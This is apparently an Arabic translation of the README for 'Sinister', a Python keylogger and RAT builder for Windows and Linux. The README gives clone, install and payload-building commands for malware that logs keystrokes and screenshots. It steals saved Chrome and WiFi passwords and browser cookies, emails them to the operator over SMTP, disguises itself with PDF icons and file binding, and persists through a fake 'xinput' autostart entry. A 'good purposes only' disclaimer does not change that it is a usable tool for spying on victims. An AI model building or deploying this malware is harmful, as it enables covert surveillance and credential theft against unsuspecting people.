
Sinister هو مولد كيلوجر لأنظمة Windows/Linux يقوم بإرسال سجلات الضغط على المفاتيح عبر البريد الإلكتروني مع معلومات مستهدفة أخرى قيمة.
هذا السكربت البايثون الصغير يمكنه القيام بعمل رائع حقًا.
Sinister هو مُولّد Keylogger لأنظمة ويندوز/لينكس، يقوم بإرسال سجلات المفاتيح ولقطات الشاشة عبر البريد الإلكتروني مع معلومات ضحية أخرى قيّمة، مكتوب بلغة Python 3.
:computer: تم إنشاء هذا المشروع فقط للأغراض الجيدة والاستخدام الشخصي.
هذا البرنامج يُقدم "كما هو" بدون أي ضمان من أي نوع. يمكنك استخدام هذا البرنامج على مسؤوليتك الخاصة. الاستخدام هو مسؤولية المستخدم النهائي بالكامل. المطورون لا يتحملون أي مسؤولية ولا يكونون مسؤولين عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.
| اسم الخادم | خادم SMTP | منفذ SMTP |
|---|---|---|
| GMAIL | smtp.gmail.com | 587 |
| OUTLOOK | smtp-mail.outlook.com | 587 |
| YAHOO | smtp.mail.yahoo.com | 587 |
| ما يمكن أن يسرقه أداة السرقة المدمجة: |
|---|
| متصفح Chrome (كلمة المرور المحفوظة) |
| WiFi (كلمة المرور المحفوظة) |
| ملفات تعريف الارتباط Chrome (بيانات تسجيل الدخول، ملفات تعريف الارتباط، السجل) |
| ملفات تعريف الارتباط Firefox (cookies.sqlite) |
| هذه الأشياء تُجلب وتُرسل: |
|---|
| نظام التشغيل |
| اسم الكمبيوتر |
| اسم المستخدم |
| IPv4 العام |
في 30 مايو 2022، قامت Google بإزالة ميزة التطبيقات الأقل أمانًا، لذا بدلاً من كلمة مرور Gmail:
كلمة المرور الخاصة بالتطبيق هذه عند إنشاء الحمولة.# انتقل إلى الدليل /opt (اختياري)
$ cd /opt/
# استنساخ هذا المستودع
$ git clone https://github.com/PushpenderIndia/Sinister.git
# انتقل إلى مجلد Sinister
$ cd Sinister
# تثبيت التبعيات
$ bash installer_linux.sh
*** ملاحظة عند ظهور مربع حوار مثبت Python أثناء تنفيذ installer_linux.sh ***
* انقر على التثبيت المخصص
* حدد المسار إلى: C:/Python37-32
### بحيث يتم تثبيت Python في هذا المسار (داخل Wine) : ~/.wine/drive_c/Python37-32
# إذا كنت تواجه أخطاء أثناء تنفيذ installer_linux.sh، حاول التثبيت باستخدام installer_linux.py
$ python3 installer_linux.py
$ chmod +x Sinister.py
$ python3 Sinister.py --help
# إنشاء الحمولة/RAT
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path
# إنشاء الحمولة باستخدام خادم SMTP لجيميل، تكوين المنفذ (خادم SMTP الافتراضي = smtp.gmail.com، المنفذ الافتراضي = 587)
$ python3 Sinister.py -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path
# إنشاء الحمولة باستخدام خادم SMTP لأوتلوك، تكوين المنفذ
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -l -o output_file_name --icon icon_path
# إنشاء الحمولة باستخدام خادم SMTP لياهو، تكوين المنفذ
$ python3 Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -l -o output_file_name --icon icon_path
ملاحظة: يمكنك أيضًا استخدام الأيقونات المخصصة لدينا من مجلد icon، فقط استخدمها هكذا --icon icon/pdf.ico
# تثبيت التبعيات
$ قم بتثبيت أحدث Python 3.x
# استنساخ هذا المستودع
$ git clone https://github.com/PushpenderIndia/Sinister.git
# انتقل إلى المستودع
$ cd Sinister
# تثبيت التبعيات
$ python -m pip install -r requirements.txt
# افتح Sinister.py في محرر نصوص وقم بتكوين السطر 16 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe"
# الحصول على قائمة المساعدة
$ python Sinister.py --help
# إنشاء الحمولة/RAT
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path
# إنشاء الحمولة باستخدام خادم SMTP لجيميل، تكوين المنفذ (خادم SMTP الافتراضي = smtp.gmail.com، المنفذ الافتراضي = 587)
$ python Sinister.py -e [email protected] -p YourEmailPass -w -o output_file_name --icon icon_path
# إنشاء الحمولة باستخدام خادم SMTP لأوتلوك، تكوين المنفذ
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp-mail.outlook.com -y 587 -w -o output_file_name --icon icon_path
# إنشاء الحمولة باستخدام خادم SMTP لياهو، تكوين المنفذ
$ python Sinister.py -e [email protected] -p YourEmailPass -x smtp.mail.yahoo.com -y 587 -w -o output_file_name --icon icon_path
ملاحظة: يمكنك أيضًا استخدام الأيقونات المخصصة لدينا من مجلد icon، فقط استخدمها هكذا --icon icon/pdf.ico
















حاول تشغيل keylogger غير متصل لاختبار التقاط سجلات المفاتيح غير المتصلة وتصحيح مشكلات keylogger عن طريق تشغيل هذه الأوامر:
قم بتشغيل test_key.py في كلا الوضعين [مترجم وخام] واكتشف ماهو الخطأ
قم بتشغيله هكذا: python test_key.py
وقُم أيضًا بتجميعه هكذا:
pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard
بعد تشغيله، ابدأ بكتابة شيء ما. ستظهر النتيجة في موجه الأوامر كل 10 ثوانٍ
ملفات keylogger غير المتصل موجودة في مجلد TestKeylogger
1. أنشئ حمولة جديدة مع علامة --debug
2. قم بتشغيل ملف الـ exe للحمولة عبر cmd [لا تقم بتنفيذ الحمولة بالنقر المزدوج عليها]
3. سيعطي الآن خطأ أكثر دقة في CMD، فقط ضع هذه المشكلة في قسم المشكلات
افتح ملف التشغيل التلقائي باستخدام أي محرر نصوص، مسار ملف التشغيل التلقائي: ~/.config/autostart/xinput.desktop
قم بإزالة هذه الأسطر الخمسة:
[Desktop Entry]
Type=Application
X-GNOME-Autostart-enabled=true
Name=Xinput
Exec="destination_file_name"
ملاحظة: destination_file_name هو اسم الملف الخبيث الذي أعطيته لـ keylogger الخاص بك باستخدام الوسيطة -o
أعد تشغيل نظامك ثم احذف الملف الخبيث المخزن في هذا المسار أدناه
المسار الوجهة، حيث يتم تخزين keylogger: ~/.config/xnput
المساهمات من أي نوع مرحب بها!
ملاحظة: إذا كان يجب أن تكون في قائمة المساهمين ولكننا نسينا ذكرك، فأخبرنا بذلك!
| الاختصار | الاسم الكامل | الوصف |
|---|
| -h | --help | إظهار رسالة المساعدة هذه والخروج |
| -i INTERVAL | --interval INTERVAL | الوقت بين التقارير بالثواني. الافتراضي=120 |
| -t TIME_PERSISTENT | --persistence TIME_PERSISTENT | جعل الاستمرارية بعد __ ثانية. الافتراضي=10 |
| -x SMTP_Server | --smtp | خادم SMTP مخصص. الافتراضي="smtp.gmail.com" |
| -y SMTP_Port | --port | منفذ SMTP مخصص. الافتراضي=587 |
| -w | --windows | إنشاء ملف ويندوز قابل للتنفيذ. |
| -l | --linux | إنشاء ملف لينكس قابل للتنفيذ. |
| -s | --steal-password | سرقة كلمات المرور المحفوظة من جهاز الضحية [نظام التشغيل المدعوم: ويندوز] |
| -b file.txt | --bind LEGITIMATE_FILE_PATH.pdf | أداة الربط التلقائي: حدد مسار الملف الشرعي. [نظام التشغيل المدعوم: ويندوز] |
| -d | --debug | سيتم تشغيل الحمولة في المقدمة مع نافذة CMD، للحصول على خطأ التنفيذ المناسب |
| الاختصار | الاسم الكامل | الوصف |
|---|
| --icon ICON | حدد مسار الأيقونة، أيقونة الملف الخبيث [ملاحظة: يجب أن تكون .ico] | |
| -e EMAIL | --email EMAIL | عنوان البريد الإلكتروني لإرسال التقارير إليه. |
| -p PASSWORD | --password PASSWORD | كلمة المرور لعنوان البريد الإلكتروني المحدد في الوسيطة -e. |
| -o OUT | --out OUT | اسم ملف الإخراج. |
![]() Pushpender Singh :computer: |
![]() Thomas Kunwar :computer: |
![]() krasnova19 :computer: |
![]() sarchish5 :computer: |
![]() chiragcode11 :computer: |
![]() C4RR0T02 :computer: |